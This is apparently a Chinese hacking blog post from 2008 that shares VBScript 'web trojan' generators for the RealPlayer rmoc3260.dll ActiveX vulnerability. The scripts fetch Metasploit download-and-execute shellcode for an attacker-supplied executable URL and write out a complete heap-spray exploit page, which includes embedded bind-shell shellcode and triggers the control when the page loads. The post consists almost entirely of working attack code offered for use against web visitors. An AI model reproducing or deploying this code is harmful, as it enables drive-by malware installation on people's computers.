
3种版本的Real Player rmoc3260.dll ActiveX Control 网马生成器

2008-04-04

夜火最近Real Player rmoc3260.dll ActiveX Control漏洞闹得很火,我一直没转相关的文章,今天在鬼仔那看到了相关的网马生成器,有2个网马生成器是lcx那发的,最后一个图形界面的是丰初写的网马生成器(带测试动画)

---------------------lcx那里发的--------------------------------------- 作者:lcx 来源:vbs小铺

代码如下:

‘以下代码保存成vbs,双击即可

1
On Error Resume Next
2
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
3
url = "http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload"
4
Body = getHTTPPage(url)
5
Set Re = New RegExp
6
Re.Pattern = "($shellcode =[sS]+</div></pre>)"
7
Set Matches = Re.Execute(Body)
8
If Matches.Count>0 Then Body = Matches(0).value
9
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
10
11
function replaceregex(str)
12
set regex=new regExp
13
regex.pattern="\x(..)\x(..)"
14
regex.IgnoreCase=true
15
regex.global=true
16
matches=regex.replace(str,"%u$2$1")
17
replaceregex=matches
18
end Function
19
20
Function getHTTPPage(Path)
21
 t = GetBody(Path)
22
 getHTTPPage = BytesToBstr(t, "GB2312")
23
End Function
24
25
Function GetBody(url)
26
 On Error Resume Next
27
 Set Retrieval = CreateObject("Microsoft.XMLHTTP")
28
 With Retrieval
29
 .Open "Get", url, False, "", ""
30
 .Send
31
 GetBody = .ResponseBody
32
 End With
33
 Set Retrieval = Nothing
34
End Function
35
36
Function BytesToBstr(Body, Cset)
37
 Dim objstream
38
 Set objstream = CreateObject("adodb.stream")
39
 objstream.Type = 1
40
 objstream.Mode = 3
41
 objstream.Open
42
 objstream.Write Body
43
 objstream.Position = 0
44
 objstream.Type = 2
45
 objstream.Charset = Cset
46
 BytesToBstr = objstream.ReadText
47
 objstream.Close
48
 Set objstream = Nothing
49
End Function
50
51
Function URLEncoding(vstrIn)
52
 strReturn = ""
53
 For aaaa = 1 To Len(vstrIn)
54
 ThisChr = Mid(vStrIn,aaaa,1)
55
 If Abs(Asc(ThisChr)) < &HFF Then
56
 strReturn = strReturn & ThisChr
57
 Else
58
 innerCode = Asc(ThisChr)
59
 If innerCode < 0 Then
60
 innerCode = innerCode + &H10000
61
 End If
62
 Hight8 = (innerCode And &HFF00) &HFF
63
 Low8 = innerCode And &HFF
64
 strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
65
 End If
66
 Next
67
 URLEncoding = strReturn
68
End Function
69
70
set fso=CreateObject("scripting.filesystemobject")
71
set fileS=fso.opentextfile("a.txt",8,true)
72
fileS.writeline replaceregex(code)
73
wscript.echo replaceregex(code)
74
files.close
75
set fso=Nothing
76
77
wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可"

------------------------------------另外一个版本-----------------------------------

1
On Error Resume Next
2
a=""
3
b=""
4
a=a+"<!-- " & vbcrlf
5
a=a+"Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)" & vbcrlf
6
a=a+"written by e.b." & vbcrlf
7
a=a+"Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45" & vbcrlf
8
a=a+"Thanks to h.d.m. and the Metasploit crew" & vbcrlf
9
a=a+"-->" & vbcrlf
10
a=a+"<html>" & vbcrlf
11
a=a+" <head>" & vbcrlf
12
a=a+" <title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title>" & vbcrlf
13
a=a+" <script language=""JavaScript"" defer>" & vbcrlf
14
a=a+" function Check() {" & vbcrlf
15
a=a+" " & vbcrlf
16
a=a+" " & vbcrlf
17
a=a+"" & vbcrlf
18
a=a+"" & vbcrlf
19
a=a+"// win32_exec - EXITFUNC=seh CMD=c:windowssystem32calc.exe Size=378 Encoder=Alpha2 http://metasploit.com " & vbcrlf
20
21
b=b+"" & vbcrlf
22
b=b+"// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com " & vbcrlf
23
b=b+"var shellcode2 = unescape(""%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"" +" & vbcrlf
24
b=b+" ""%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a"" +" & vbcrlf
25
b=b+" ""%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241"" +" & vbcrlf
26
b=b+" ""%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c"" +" & vbcrlf
27
b=b+" ""%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f"" +" & vbcrlf
28
b=b+" ""%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c"" +" & vbcrlf
29
b=b+" ""%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f"" +" & vbcrlf
30
b=b+" ""%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b"" +" & vbcrlf
31
b=b+" ""%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c"" +" & vbcrlf
32
b=b+" ""%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31"" +" & vbcrlf
33
b=b+" ""%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35"" +" & vbcrlf
34
b=b+" ""%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b"" +" & vbcrlf
35
b=b+" ""%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663"" +" & vbcrlf
36
b=b+" ""%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733"" +" & vbcrlf
37
b=b+" ""%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470"" +" & vbcrlf
38
b=b+" ""%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358"" +" & vbcrlf
39
b=b+" ""%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f"" +" & vbcrlf
40
b=b+" ""%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458"" +" & vbcrlf
41
b=b+" ""%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58"" +" & vbcrlf
42
b=b+" ""%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f"" +" & vbcrlf
43
b=b+" ""%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275"" +" & vbcrlf
44
b=b+" ""%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45"" +" & vbcrlf
45
b=b+" ""%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033"" +" & vbcrlf
46
b=b+" ""%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046"" +" & vbcrlf
47
b=b+" ""%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035"" +" & vbcrlf
48
b=b+" ""%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036"" +" & vbcrlf
49
b=b+" ""%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64"" +" & vbcrlf
50
b=b+" ""%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35"" +" & vbcrlf
51
b=b+" ""%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67"" +" & vbcrlf
52
b=b+" ""%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30"" +" & vbcrlf
53
b=b+" ""%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f"" +" & vbcrlf
54
b=b+" ""%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246"" +" & vbcrlf
55
b=b+" ""%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139"" +" & vbcrlf
56
b=b+" ""%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652"" +" & vbcrlf
57
b=b+" ""%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e"" +" & vbcrlf
58
b=b+" ""%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b"" +" & vbcrlf
59
b=b+" ""%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075"" +" & vbcrlf
60
b=b+" ""%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251"" +" & vbcrlf
61
b=b+" ""%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f"" +" & vbcrlf
62
b=b+" ""%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f"" +" & vbcrlf
63
b=b+" ""%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b"" +" & vbcrlf
64
b=b+" ""%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952"" +" & vbcrlf
65
b=b+" ""%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73"" +" & vbcrlf
66
b=b+" ""%u684f%u3956%u386f%u4350"");" & vbcrlf
67
b=b+"" & vbcrlf
68
b=b+"" & vbcrlf
69
b=b+"  var bigblock = unescape(""%u0C0C%u0C0C"");" & vbcrlf
70
b=b+"  var headersize = 20;" & vbcrlf
71
b=b+"  var slackspace = headersize + shellcode1.length;" & vbcrlf
72
b=b+"  while (bigblock.length < slackspace) bigblock += bigblock;" & vbcrlf
73
b=b+"  var fillblock = bigblock.substring(0,slackspace);" & vbcrlf
74
b=b+"  var block = bigblock.substring(0,bigblock.length - slackspace);" & vbcrlf
75
b=b+"  while (block.length + slackspace < 0x40000) block = block + block + fillblock;" & vbcrlf
76
b=b+"" & vbcrlf
77
b=b+"  " & vbcrlf
78
b=b+"" & vbcrlf
79
b=b+"  var memory = new Array();" & vbcrlf
80
b=b+"  for (i = 0; i < 400; i++){ memory[i] = block + shellcode1 }" & vbcrlf
81
b=b+"  " & vbcrlf
82
b=b+"  var buf = '';" & vbcrlf
83
b=b+"  while (buf.length < 32) buf = buf + unescape(""%0C"");" & vbcrlf
84
b=b+"" & vbcrlf
85
b=b+"  var m = '';" & vbcrlf
86
b=b+"" & vbcrlf
87
b=b+"  m = obj.Console;" & vbcrlf
88
b=b+"  obj.Console = buf;" & vbcrlf
89
b=b+"  obj.Console = m;" & vbcrlf
90
b=b+"  " & vbcrlf
91
b=b+"  m = obj.Console;" & vbcrlf
92
b=b+"  obj.Console = buf;" & vbcrlf
93
b=b+"  obj.Console = m;" & vbcrlf
94
b=b+"  " & vbcrlf
95
b=b+"  " & vbcrlf
96
b=b+" } " & vbcrlf
97
b=b+" " & vbcrlf
98
b=b+" </script>" & vbcrlf
99
b=b+" " & vbcrlf
100
b=b+" " & vbcrlf
101
b=b+"</head>" & vbcrlf
102
b=b+" <body onload=""JavaScript: return Check();"">" & vbcrlf
103
b=b+"  <object classid=""clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93"" id=""obj"">" & vbcrlf
104
b=b+"    Unable to create object" & vbcrlf
105
b=b+"  </object>" & vbcrlf
106
b=b+"" & vbcrlf
107
b=b+" </body>" & vbcrlf
108
b=b+"</html>" & vbcrlf
109
b=b+"" & vbcrlf
110
b=b+"# milw0rm.com [2008-04-01]" & vbcrlf
111
112
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
113
url = "http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload"
114
Body = getHTTPPage(url)
115
Set Re = New RegExp
116
Re.Pattern = "($shellcode =[sS]+</div></pre>)"
117
Set Matches = Re.Execute(Body)
118
If Matches.Count>0 Then Body = Matches(0).value
119
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
120
121
function replaceregex(str)
122
set regex=new regExp
123
regex.pattern="\x(..)\x(..)"
124
regex.IgnoreCase=true
125
regex.global=true
126
matches=regex.replace(str,"%u$2$1")
127
replaceregex=matches
128
end Function
129
130
Function getHTTPPage(Path)
131
 t = GetBody(Path)
132
 getHTTPPage = BytesToBstr(t, "GB2312")
133
End Function
134
135
Function GetBody(url)
136
 On Error Resume Next
137
 Set Retrieval = CreateObject("Microsoft.XMLHTTP")
138
 With Retrieval
139
 .Open "Get", url, False, "", ""
140
 .Send
141
 GetBody = .ResponseBody
142
 End With
143
 Set Retrieval = Nothing
144
End Function
145
146
Function BytesToBstr(Body, Cset)
147
 Dim objstream
148
 Set objstream = CreateObject("adodb.stream")
149
 objstream.Type = 1
150
 objstream.Mode = 3
151
 objstream.Open
152
 objstream.Write Body
153
 objstream.Position = 0
154
 objstream.Type = 2
155
 objstream.Charset = Cset
156
 BytesToBstr = objstream.ReadText
157
 objstream.Close
158
 Set objstream = Nothing
159
End Function
160
161
Function URLEncoding(vstrIn)
162
 strReturn = ""
163
 For aaaa = 1 To Len(vstrIn)
164
 ThisChr = Mid(vStrIn,aaaa,1)
165
 If Abs(Asc(ThisChr)) < &HFF Then
166
 strReturn = strReturn & ThisChr
167
 Else
168
 innerCode = Asc(ThisChr)
169
 If innerCode < 0 Then
170
 innerCode = innerCode + &H10000
171
 End If
172
 Hight8 = (innerCode And &HFF00) &HFF
173
 Low8 = innerCode And &HFF
174
 strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
175
 End If
176
 Next
177
 URLEncoding = strReturn
178
End Function
179
180
set fso=CreateObject("scripting.filesystemobject")
181
set fileS=fso.opentextfile("a.txt",2,true)
182
fileS.writeline a
183
fileS.writeline "var shellcode1 = unescape(""" & replaceregex(code) & """);"
184
fileS.writeline b
185
files.close
186
set fso=Nothing
187
188
wscript.echo Chr(13)&"ok,生成a.txt"

------------------------------------丰初的图形界面的(带测试动画)-----------------------------------


